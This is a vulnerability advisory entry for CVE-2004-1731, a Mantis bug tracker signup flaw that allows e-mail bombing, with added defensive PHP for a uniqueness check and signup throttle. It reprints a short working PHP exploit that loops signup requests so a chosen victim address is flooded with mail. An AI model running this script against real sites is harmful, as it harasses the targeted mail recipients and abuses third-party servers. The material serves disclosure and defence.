Mantis New Account Signup Mass Emailing Vulnerability

Vulnerability ID 1108128 Vulnerability type Design error
Published 2004-08-21 Updated 2005-10-20
CVE ID CVE-2004-1731
CNNVD ID CNNVD-200408-209
Platform PHP CVSS score 5.0
|Source
https://www.exploit-db.com/exploits/24392
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200408-209
|Details
The signup_page.php script of the Mantis bug tracker is vulnerable: a remote attacker can trigger an e-mail bomb by creating many user accounts that all supply the same e-mail address.
|Exploit
source: http://www.securityfocus.com/bid/10995/info

Mantis is reportedly susceptible to a vulnerability in its signup process allowing mass email attacks.

When a new user signs up to Mantis, the system automatically sends an email message to the given email address. This email contains the user's new password for the affected Mantis bug tracking system.

Mantis fails to ensure that only one account exists with the specified email address, and therefore an attacker can create a massive amount of email directed at any target they wish. This email originates from the Mantis server, not from the attacker, so the target sees only the tracker's address.

The vendor has implemented a captcha system for new account signup requests in the CVS version of the software. All currently released versions of the software are reported vulnerable.

<?php

// Please change this, because it is my e-mail :)
$email = "anyemail@address";
$base_user = "test";
$i = 0;
$site = "www.example.com";   // host only; the scheme is added below

for ($i = 0; $i <= 15; $i++)
{
    echo("Sending e-mail number $i\n");
    $user = "$base_user$i";
    echo("New user is $user\n");
    $url = "http://$site/signup.php?username=$user&email=$email";
    echo("URL is $url\n");
    $fd = fopen($url, "r");   // fetching a URL this way needs allow_url_fopen
    echo("E-mail $i sent\n");
    fclose($fd);
}

?>
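As an added example (not Mantis code and not part of the original advisory), the following PHP shows the check the advisory says was missing: a signup handler that refuses to create a second account for an e-mail address already on file and throttles repeated signups from one source, so a burst of requests produces at most one password e-mail. The user table, throttle state, addresses, source identifier and limits are constructed for the example.

```php
<?php
// Added example, not Mantis code: signup handling with a uniqueness
// check on the e-mail address and a per-source signup throttle.

// Constructed in-memory "user table": e-mail address => username.
$users = ['alice@example.org' => 'alice'];

// Constructed throttle state: source => ['count' => n, 'start' => timestamp].
$signupAttempts = [];

// Assumed policy: at most this many signup attempts per source per hour.
const MAX_SIGNUPS_PER_HOUR = 3;

function is_valid_email(string $email): bool
{
    return filter_var($email, FILTER_VALIDATE_EMAIL) !== false;
}

// Returns true when the source has exceeded its hourly signup budget.
function throttle_exceeded(array &$attempts, string $source, int $now): bool
{
    if (!isset($attempts[$source]) || $now - $attempts[$source]['start'] >= 3600) {
        $attempts[$source] = ['count' => 0, 'start' => $now];
    }
    $attempts[$source]['count']++;
    return $attempts[$source]['count'] > MAX_SIGNUPS_PER_HOUR;
}

// Returns ['ok' => bool, 'mail_sent' => bool, 'reason' => string].
function handle_signup(array &$users, array &$attempts, string $username,
                       string $email, string $source, int $now): array
{
    $email = strtolower(trim($email));
    if (!is_valid_email($email)) {
        return ['ok' => false, 'mail_sent' => false, 'reason' => 'invalid e-mail'];
    }
    if (throttle_exceeded($attempts, $source, $now)) {
        return ['ok' => false, 'mail_sent' => false, 'reason' => 'too many signups'];
    }
    if (isset($users[$email])) {
        // Address already registered: answer exactly as on success so the
        // response does not reveal which addresses exist, but send no mail.
        return ['ok' => true, 'mail_sent' => false, 'reason' => 'duplicate e-mail'];
    }
    $users[$email] = $username;
    // A real handler would generate the password and send the mail here.
    return ['ok' => true, 'mail_sent' => true, 'reason' => 'created'];
}

// Replay the pattern from the advisory: a burst of signups, one address.
$sent = 0;
for ($i = 0; $i <= 15; $i++) {
    $r = handle_signup($users, $signupAttempts, "test$i",
                       'victim@example.org', '203.0.113.5', 1000);
    if ($r['ok'] && $r['mail_sent']) {
        $sent++;
    }
}
echo "Password e-mails sent for this burst: $sent\n";
```

The uniqueness check alone already limits the burst to one e-mail; the throttle is there because an attacker who rotates addresses is not stopped by uniqueness, and because the advisory's own fix (a captcha on signup) addresses the same automation problem from a different angle. Returning the same response for a duplicate address as for a fresh one keeps the signup form from doubling as an account-enumeration oracle.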
|References

Source: XF
Name: mantis-improper-account-validation (17093)
Link: http://xforce.iss.net/xforce/xfdb/17093
Source: BID
Name: 10995
Link: http://www.securityfocus.com/bid/10995
Source: BUGTRAQ
Name: 20040820 Multiple Vulnerabilities in Mantis Bugtracker
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=109312225727345&w=2
